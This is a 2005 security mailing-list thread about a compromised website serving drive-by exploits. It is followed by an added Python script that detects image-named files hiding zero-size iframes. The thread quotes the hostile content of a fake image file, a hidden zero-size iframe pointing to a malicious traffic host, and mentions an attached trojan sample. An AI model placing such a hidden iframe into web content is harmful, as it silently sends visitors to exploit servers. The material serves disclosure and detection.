From: <yorn () governmentsecurity org>
Date: Tue, 4 Oct 2005 19:52:01 +0200
x.chm contains money.exe (needs to be added to virusscanners)
I don't have time to analyze the file, but it is attached here in a zip
file. Password to extract is 'money'. Anyone want to run some analysis?
From: full-disclosure-bounces () lists grok org uk
[mailto:full-disclosure-bounces () lists grok org uk] On Behalf Of Aditya
Sent: Tuesday, October 04, 2005 11:35 AM
To: 'THORNTON Simon'
Cc: security () molecularmultimedia com; abuse () molecularmultimedia com;
webmaster () molecularmultimedia com
Subject: RE: [Full-disclosure] http://molecularmultimedia.com/
an exploit distribution point (update2)
I've had the site www.ok-ok.biz disabled by the ISP, at least it will
deny the perps the ability to find out who has been compromised. The
site is obviously just a front, will see what can be done about this.
The site was found after 2 different attempts here are more details
http://newvisioncc.org/photo/myphoto.jpg which is
<iframe src="http://traff.root-soft.com" width="0" height="0"></iframe>
---- end myphoto.jpg
And http://traff.root-soft.com is
And molecularmultimedia.com is the front end to something more
Also visiting molecularmultimedia.com with mozilla with the latest
version of mozilla with all the patches still caused the trojan to be
executed - I found this from the Norton antivir logs ....
It's amazing looking at the page source, there are at least 4
different exploits (I'm still analysing this) encoded into the
And they are pretty good also - new 0day for mozilla also 1.7.12!
Will let you all know if I find anything!...
Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia - http://secunia.com/
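
Added example, not part of the original posts: a defender-side check for the pattern reported above, where a resource named like an image (myphoto.jpg) is really HTML carrying a zero-size iframe. The function names and the "real.jpg" and "page.html" samples are constructed for illustration; the myphoto.jpg body is the line quoted in the message.

```python
import re

# Leading bytes of common image formats (JPEG, PNG, GIF, BMP).
IMAGE_MAGIC = (b"\xff\xd8\xff", b"\x89PNG\r\n\x1a\n", b"GIF87a", b"GIF89a", b"BM")
IMAGE_EXT = (".jpg", ".jpeg", ".png", ".gif", ".bmp")

IFRAME_RE = re.compile(rb"<iframe\b[^>]*>", re.I)
ATTR_RE = re.compile(rb"""\b(src|width|height)\s*=\s*["']?([^"'\s>]+)""", re.I)


def hidden_iframes(body):
    """Return the src of every iframe whose width or height is zero."""
    found = []
    for tag in IFRAME_RE.findall(body):
        attrs = {k.lower(): v for k, v in ATTR_RE.findall(tag)}
        dims = (attrs.get(b"width"), attrs.get(b"height"))
        # "0" and "0px" both render an invisible frame.
        if any(d is not None and d.lower().rstrip(b"px") == b"0" for d in dims):
            found.append(attrs.get(b"src", b"").decode("ascii", "replace"))
    return found


def inspect(name, body):
    """Compare what a fetched resource is called with what it contains."""
    named_as_image = name.lower().endswith(IMAGE_EXT)
    is_image = body.startswith(IMAGE_MAGIC)
    return {
        "name": name,
        "disguised": named_as_image and not is_image,
        "hidden_iframes": hidden_iframes(body),
    }


# Sample bodies: the first is the content quoted in the message above,
# the other two are constructed for comparison.
SAMPLES = {
    "myphoto.jpg": b'<iframe src="http://traff.root-soft.com" width="0" height="0"></iframe>\n',
    "real.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 16,
    "page.html": b'<iframe src="https://example.org/map" width="600" height="400"></iframe>',
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(inspect(name, body))
```

Run over proxy or crawler captures, a resource that comes back both "disguised" and with a non-empty "hidden_iframes" list is the combination described in this thread.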